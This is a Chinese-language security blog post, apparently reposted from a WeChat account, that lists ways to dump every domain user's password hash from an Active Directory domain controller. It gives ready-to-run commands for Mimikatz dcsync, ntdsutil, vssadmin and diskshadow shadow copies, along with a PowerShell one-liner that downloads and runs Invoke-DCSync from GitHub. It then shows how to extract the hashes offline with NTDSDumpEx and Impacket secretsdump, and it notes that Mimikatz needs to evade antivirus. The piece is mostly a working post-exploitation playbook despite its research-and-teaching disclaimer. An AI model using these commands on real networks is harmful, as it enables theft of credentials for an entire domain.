域渗透|导出域用户Hash方法总结

admin 2021年3月17日16:00:50评论638 views字数 3177阅读10分35秒阅读模式

转自HACK之道

在拥有域管权限时,可以提取所有域用户的密码Hash,为下一步渗透做准备。

一、如何 Dump Hash

Hash 值存储在域控制器中(C:WindowsNTDSNTDS.DIT)
NTDS.DIT 文件经常被操作系统使用,无法直接复制到其它位置。可尝试以下方法 Dump Hash。

1. Mimikatz

Mimikatz有一个功能(dcsync),它利用目录复制服务(DRS)从 NTDS.DIT 文件中检索密码 Hash 值。

需要权限:域管权限
Mimikatz 需免杀

# 所有用户Mimikatz "lsadump::dcsync /domain:test.com /all /csv" exit > hash.txt
# 指定用户Mimikatz "lsadump::dcsync /domain:test.com /user:username" exit > hash.txt


2. Ntdsutil

Ntdsutil 域控制器默认安装,使管理员能访问和管理 Windows Active Directory 数据库。渗透测试中可以用它来拍摄 ntds.dit 文件的快照

需要权限:域管权限

# 创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
GUID 为 {aa488f5b-40c7-4044-b24f-16fd041a6de2}

# 挂载快照
ntdsutil snapshot "mount GUID" quit quit

# 复制 ntds.dit
copy C:$SNAP_201908200435_VOLUMEC$windowsNTDSntds.dit c:ntds.dit

# 卸载快照
ntdsutil snapshot "unmount GUID" quit quit

# 删除快照
ntdsutil snapshot "delete GUID" quit quit

# 查询快照
ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit


3. Vssadmin

域控制器默认安装

需要权限:域管权限

# 查询当前系统的快照vssadmin list shadows
# 创建快照vssadmin create shadow /for=c: /autoretry=10"Shadow Copy Volume Name" 为 \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1"Shadow Copy ID" 为 {aa488f5b-40c7-4044-b24f-16fd041a6de2}
# 复制 ntds.ditcopy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1windowsNTDSntds.dit c:ntds.dit
# 删除快照vssadmin delete shadows /for=c: /quiet


4. Diskshadow

DiskShadow 是由微软官方签名的,Windows Server 2008、2012、2016 都包含了 DiskShadow,所在目录C:windowssystem32diskshadow.exe。包含交互式命令脚本模式

下面利用脚本模式提取AD数据库

# 查看存放 `ntds.dit` 的逻辑驱动器(一般为 C 盘)# 找出系统没有使用的逻辑驱动器号wmic logicaldisk
# 调用脚本C:windowssystem32diskshadow.exe /s C:shadow.txt


shadow.txt 内容

set context persistent nowritersadd volume c: alias someAliascreateexpose %someAlias% z:exec "C:windowssystem32cmd.exe" /c copy z:windowsntdsntds.dit c:ntds.ditdelete shadows volume %someAlias%reset


5. Powershell

项目地址:https://github.com/EmpireProject/Empire

# 远程加载 Invoke-DCSync.ps1powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-DCSync.ps1')";Invoke-DCSync -PWDumpFormat > hash.txt


二、如何从 ntds.dit 提取 Hash

1. NTDSDumpEx

usage: ntdsdumpex.exe <-d ntds.dit> <-k HEX-SYS-KEY | -s system.hiv |-r> [-o out.txt] [-h] [-m] [-p] [-u]-d    path of ntds.dit database-k    use specified SYSKEY-s    parse SYSKEY from specified system.hiv-r    read SYSKEY from registry-o    write output into-h    dump hash histories(if available)-p    dump description and path of home directory-m    dump machine accounts-u    USE UPPER-CASE-HEX
# 离线模式:先导出注册表reg save hklmsystem system.hivNTDSDumpEx.exe -d ntds.dit -s system.hiv -o hash.txt
# 在线模式:无需导出注册表NTDSDumpEx.exe -d ntds.dit -r -o hash.txt

2. Impacket

项目地址:https://github.com/SecureAuthCorp/impacket

因为 Kali 的 python 环境安装得比较全,所以使用 Kali 来解 Hash

git clone https://github.com/SecureAuthCorp/impacket
# 安装所需库 pip install .python setup.py
# 使用 secretsdump.py 解 Hash/impacket/examples# python secretsdump.py -ntds /home/workspace/hash/ntds.dit -system /home/workspace/hash/sys.hiv LOCAL > /home/workspace/hash/hash.txt


三、总结

  1. Mimikatz 在域用户机器执行需要域管权限时,可使用 psexec计划任务等远程执行

  2. 使用 NtdsutilVssadmin 等卷影拷贝工具时,需要先开启 Volume Shadow Copy Service 服务

  3. 有时遇到 NTDSDumpEx 提取出错,可以尝试修复 ntds.dit,修复后还无法提取,则使用 secretsdump.py。缺点:比较耗时

四、参考文章

Dump域内用户Hash姿势集合
域渗透——获得域控服务器的NTDS.dit文件
NTDS.dit密码快速提取工具

作者:scarletf,来源:https://scarletf.github.io/

域渗透|导出域用户Hash方法总结


一如既往的学习,一如既往的整理,一如即往的分享。感谢支持域渗透|导出域用户Hash方法总结

“如侵权请私聊公众号删文”



扫描关注LemonSec

域渗透|导出域用户Hash方法总结

觉得不错点个“赞”、“在看”哦域渗透|导出域用户Hash方法总结


本文始发于微信公众号(LemonSec):域渗透|导出域用户Hash方法总结

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月17日16:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   域渗透|导出域用户Hash方法总结https://cn-sec.com/archives/294176.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息